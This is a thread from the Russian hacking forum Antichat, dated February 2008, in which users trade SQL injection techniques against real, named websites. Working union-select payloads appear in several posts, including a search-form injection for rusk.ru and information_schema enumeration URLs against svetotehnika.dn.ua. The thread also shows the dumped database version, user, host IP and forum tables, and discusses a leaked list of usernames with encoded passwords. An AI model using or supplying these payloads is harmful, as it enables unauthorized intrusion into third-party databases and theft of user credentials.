ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1071  
Старый 26.02.2008, 23:11
Аватар для samarin
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Цитата:
ага понял... там блин = фильтруется надо like пользовать
Спасибо-Сам бы не разобрался
 
Ответить с цитированием

  #1072  
Старый 27.02.2008, 01:40
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Цитата:
Сообщение от fobofob  
и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн > (· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде

очень похоже на бинарный мд5

PHP код:
string md5 (string str [, bool raw_output]) 
если дать второй параметр, то получится что-то типа твоего
 
Ответить с цитированием

  #1073  
Старый 27.02.2008, 01:52
Аватар для Macro
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от halkfild  
очень похоже на бинарный мд5

PHP код:
string md5 (string str [, bool raw_output]) 
если дать второй параметр, то получится что-то типа твоего
Не похоже. Бинарный md5 всегда содержит одинаковое количество символов, равное шестнадцати. А тут, как видишь, оно все время разное.
 
Ответить с цитированием

  #1074  
Старый 27.02.2008, 11:20
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Возможно, это функция MySql ENCODE или AES_ENCRYPT
 
Ответить с цитированием

  #1075  
Старый 27.02.2008, 21:47
Аватар для Климент_Ворошилов
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию

Все кто может просветите вот в таком вопросе. Есть сайт
http://www.rusk.ru/search.php?action=news
Если в форму "поиск" ввести какую-нибудь ерунду, а на в конце поставить "кавычку", то вылетает ошибка:
SQL ERROR..... N1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sdfd'') > 0))GROUP BY article.idar ORDER BY article.insdate DESC' at line 1
Интересует в обще-то следующее. Это на самом деле SQL? Можно ли из этого что-то "выжать"? А самое главное каков будет рабочий запрос? Ну то есть что надо ввести в поле формы или в УРЛ адрес, чтобы пробить инфу о базе и т.д? Правильно ли я понял, что запрос должен быть не совсем стандартный с использованием скобок? (в тексте описания ошибки они вроде как присутствуют, а где-то читал, что скобки должны быть закрыты в запросе).
Спасибо за возможный ответ.
 
Ответить с цитированием

  #1076  
Старый 27.02.2008, 22:10
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

введи в поиске:
sd')>0)) union select 1,2,3,4,5--
незабудь пробел после --
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #1077  
Старый 27.02.2008, 22:58
Аватар для Климент_Ворошилов
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию

Ух, спасибо, всегда приятно общаться с умным человеком, а то я уж всю голову сломал куда и чего вписать. Оно ж получается, что вся инфа-то в описании ошибки была, тока надо правильно ей пользоваться.
Ещё раз мерси.
 
Ответить с цитированием

  #1078  
Старый 27.02.2008, 23:43
Аватар для samarin
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Вчера уже обсуждалась тема по поводу information_schema.columns
cегодня та же проблема, только у меня не получилось ни чар ни лайк, может что-то неправильно делал-объясните пожалуйста!
---------------------------------------------------------
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*

5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base

TRIGGERS
2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group

2103_forum_users
 
Ответить с цитированием

  #1079  
Старый 27.02.2008, 23:49
Аватар для MaSter GeN
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ?
 
Ответить с цитированием

  #1080  
Старый 28.02.2008, 00:29
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

samarin
на этом сайте всё работает
_http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,column_name,3+from+information _schema.columns+where+table_name=0x323130335f666f7 2756d5f63617465676f72696573+limit+1,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ